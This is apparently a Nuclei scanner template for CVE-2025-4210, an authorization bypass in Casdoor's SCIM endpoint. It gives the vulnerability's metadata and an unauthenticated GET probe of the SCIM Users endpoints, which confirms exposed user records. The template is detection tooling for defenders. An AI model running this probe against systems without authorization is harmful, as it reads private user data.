id: CVE-2025-4210

info:
  name: Casdoor - Authorization Bypass
  author: theamanrawat
  severity: high
  description: |
    Casdoor up to 1.811.0 contains an authorization bypass caused by manipulation in HandleScim function in controllers/scim.go, letting remote attackers bypass authorization, exploit requires remote access.
  impact: |
    Attackers can bypass authorization, potentially gaining unauthorized access to sensitive data or functionalities.
  remediation: |
    Upgrade to version 1.812.0.
  reference:
    - https://github.com/casdoor/casdoor/commit/3d12ac8dc2282369296c3386815c00a06c6a92fe
    - https://nvd.nist.gov/vuln/detail/CVE-2025-4210
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L
    cvss-score: 7.3
    cve-id: CVE-2025-4210
    epss-score: 0.0617
    epss-percentile: 0.90993
    cwe-id: CWE-285
  metadata:
    verified: true
    max-requests: 2
    vendor: casdoor
    product: casdoor
  tags: cve,cve2025,casdoor,scim,auth-bypass,disclosure,vkev

http:
  - method: GET
    path:
      - "{{BaseURL}}/scim/v2/Users"
      - "{{BaseURL}}/api/scim/v2/Users"

    stop-at-first-match: true
    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "schemas"
          - "totalResults"
          - "Resources"
          - "givenName"
        condition: and

      - type: word
        part: header
        words:
          - "application/scim+json"
          - "application/json"
        condition: or

      - type: status
        status:
          - 200
# digest: 490a0046304402207ad5e474ef7493116e16d25ff5e98fb2bc7b3bfe2031cf539c25de4c712f91b70220708a93278b26e965a0f276504d2ae4a8d251bd6ed8f1f2ac4529cc1fe974b428:922c64590222798bb761d5b6d8e72950